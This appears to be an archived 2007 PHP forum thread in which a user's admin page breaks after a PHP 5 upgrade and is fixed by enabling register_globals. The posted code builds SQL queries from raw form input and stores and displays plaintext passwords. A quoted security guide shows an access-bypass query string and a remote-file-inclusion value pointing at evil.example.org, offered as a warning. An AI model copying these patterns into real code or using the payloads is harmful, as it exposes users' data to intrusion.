PDA

View Full Version : Problems with a form and a session


cocoonfx
10-20-2007, 03:08 PM
Hello

I have built an admin area for a member site and for a week it has been working fine adding users no problem. Then i wanted to add a new user today and then i get the following message.

The crazy thing is i am using the exact same admin area for my own site and i have absolutely no problems. HELP!

"Unknown: Your script possibly relies on a session side-effect which existed until PHP 4.2.3. Please be advised that the session extension does not consider global variables as a source of data, unless register_globals is enabled. You can disable this functionality and this warning by setting session.bug_compat_42 or session.bug_compat_warn to off, respectively. in Unknown on line 0"

davidj
10-20-2007, 04:21 PM
are you using dreamweaver code to do this?

if you hand coded this then we can proceed if you used dreamweaver functions to write this for you i cant help but i believe Dom is going to set up a dreamweaver wizard forum.

if you wrote this yourself then i need to see the code

cocoonfx
10-20-2007, 10:58 PM
Hello


I did the code myself.

Here is the code.


<?PHP
include("includes/connect.php"); /// Connects to db
session_start();
include("includes/security.php");
$id=$_SESSION['id'];
$level= $_SESSION['level'];
////////////////////////////////////////////////////////
$query =sprintf("SELECT * FROM user_admin where user_id='$id' ");
$result =mysql_query($query,$dbh);
$rowAccount = mysql_fetch_array($result);
/////////////////////////////////////////////////////////
$username = $_POST['username'];
$password = $_POST['password'];
$email = $_POST['email'];
$level = $_POST['level'];
$upload1 = $_POST['upload1'];
$submit = $_POST['submit'];

if ($submit && $username && $password && $email && $level){
$query =sprintf("INSERT into user_admin (username,password,email,level,upload1) VALUES ('$username','$password','$email','$level','$uploa d1')");
mysql_query($query,$dbh)or die(mysql_error());
}elseif($submit){
echo "You have not filled in the form";
}
$query =sprintf("SELECT * From user_admin");
$result=mysql_query($query,$dbh);
$rowMember=mysql_fetch_array($result);

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Welcome <?PHP echo $rowAccount['username'];?> to your training zone</title>

<style type="text/css" media="screen">
/*<![CDATA[ */
@import url(members.css);
</style>
</head>
<body>
<div id="wrapper">
<div id="logohead">
<div id="subhead">
<h2>Welcome <?PHP echo $rowAccount['username'];?> to your training zone
<?PHP setlocale (LC_TIME,'en_us');echo strftime (' %B %d %G, %T');echo "\n";?></h2>
</div>
</div>
<div id="main">
<div id="infopane">
<div class="parent">
<div class="chrome5">
<h3>Please navigate round here</h3>
<p><a href="userzone.php">User Area</a></p>
<input name="Button" type="submit" id="Logoff" value="Logoff" onclick="document.location.href='logoff.php'" />
</div>
</div>
</div>
<div class="infopane">
<div class="parent">
<div class="chrome5">
<h3>Training Zone Calulator</h3>
<form id="form2" name="form2" method="post" action="<?php $_SERVER['PHP_SELF']; ?>">
<label for="username">User Name</label>
<input type="text" name="username" id="username"/>
<label for="password">Password</label>
<input type="text" name="password" id="password"/>
<label for="email">Email</label>
<input type="text" name="email" id="email"/>
<label for="level">level</label>
<input type="text" name="level" id="level"/>
<label for="upload1">Food Dairy</label>
<input type="text" name="upload1" id="upload1"/>
<input name="Submit" type="submit" id="Submit" value="Submit" />
</form>
</div>
</div>
</div>
<div class="infopane1">
<div class="parent">
<div class="chrome5">
<h3>Members Table</h3>
<form id="form4" name="form4" method="post" action="<?php $_SERVER['PHP_SELF']; ?>">
<table width="700" border="1">
<tr>
<td><label for="username1">User Name</label></td>
<td><label for="password1">Password</label></td>
<td><label for="email1">email</label></td>
<td><label for="level1">level</label></td>
<td><label for="upload11">upload</label>
</td>
</tr>
<?php do{ ?>
<tr class="style1">
<td><input type="text" name="username1" id="username1" value="<?php echo $rowMember['username'];?>"/>
</td>
<td><input type="text" name="password1" id="password1" value="<?php echo $rowMember['password'];?>"/>
</td>
<td><input type="text" name="email1" id="emal1" value="<?php echo $rowMember['email'];?>"/></td>
<td width="25"><input type="text" name="level1" id="level1" value="<?php echo $rowMember['level'];?>"/></td>

<td><input type="text" name="upload11" id="upload11" value="<?php echo $rowMember['upload1'];?>"/></td>
</tr>
<?php }while ($rowMember = mysql_fetch_array($result)); ?>
</table>
</form>
</div>
</div>
</div>
</div>
<div class="separator"></div>
</div>
</body>
</html>

cocoon... @ 80+ posts you should know to use the code tags when posting code </slap hand>

davidj
10-20-2007, 11:05 PM
what version of php are you using

cocoonfx
10-23-2007, 12:39 PM
hello david


The server is PHP 5 but the same script works on another site on the same server......

Have a coded it wrong or could it be a server side problem?

davidj
10-23-2007, 01:56 PM
to me it looks like it was written for PHP v4x and you have ported it onto a server running v5. If this is the case you going to have to trawl through the code looking for bugs or depreciated syntax

you have some includes in there. I would comment them out one at a time and run the script to see if you can find where the script is falling over. Build your script up bit by bit in order to located the bad code

cocoonfx
10-23-2007, 02:36 PM
Thanks david i think i did use 4.6 or something to code this. My web host did tell me there upgrading to PHP5 and i should check all the pages with PHP to make sure it works in PHP 5. I was hoping that i could get away with it.

I will setup a test table and then build the code up as you said.

Thanks again.

Also are you going to have anything on the forum showing the differences between 4 and 5?

davidj
10-23-2007, 02:39 PM
I was hoping that i could get away with it.

AhhhhhhhAHAHAHAHAHAHAHAHAAHAHA

{laughs madly and uncontrollably with no expression whilst wringing hands like a mad person!}

cocoonfx
10-23-2007, 08:17 PM
Hello....


I have contacted my hosting company and it turns out that the ".htaaccess" file in within the directory containing the scripts need to be switched to on.

Apprently you just add "php_flag register_globals on"

And then the folder with the this in will allow the script to run. I did ask if i could do this within the php script but they said no not that there aware of and would not recommend trying......

So tomorrow this should be working as i got the hosting company to do it for me.

davidj
10-24-2007, 08:54 AM
http://phpsec.org/projects/guide/1.html (http://phpsec.org/projects/guide/1.html)


Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.
Why is it a security risk? Good examples are difficult to produce for everyone, because it often requires a unique situation to make the risk clear. However, the most common example is that found in the PHP manual:


<?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?>


With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.
Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:


<?php include "$path/script.php"; ?>

With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:

<?php include 'http://evil.example.org/?/script.php'; ?>


If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ (http://evil.example.org/) just as if it were a local file. This is a major security vulnerability, and it is one that has been discovered in some popular open source applications.
Initializing $path can mitigate this particular risk, but so does disabling register_globals. Whereas a developer's mistake can lead to an uninitialized variable, disabling register_globals is a global configuration change that is far less likely to be overlooked.
The convenience is wonderful, and those of us who have had to manually handle form data in the past appreciate this. However, using the $_POST and $_GET superglobal arrays is still very convenient, and it's not worth the added risk to enable register_globals. While I completely disagree with arguments that equate register_globals to poor security, I do recommend that it be disabled.
In addition to all of this, disabling register_globals encourages developers to be mindful of the origin of data, and this is an important characteristic of any security-conscious developer.

cocoonfx
10-26-2007, 10:13 AM
Thank you for the information.

I will have a look into this over the weekend and implement it as much as i possible.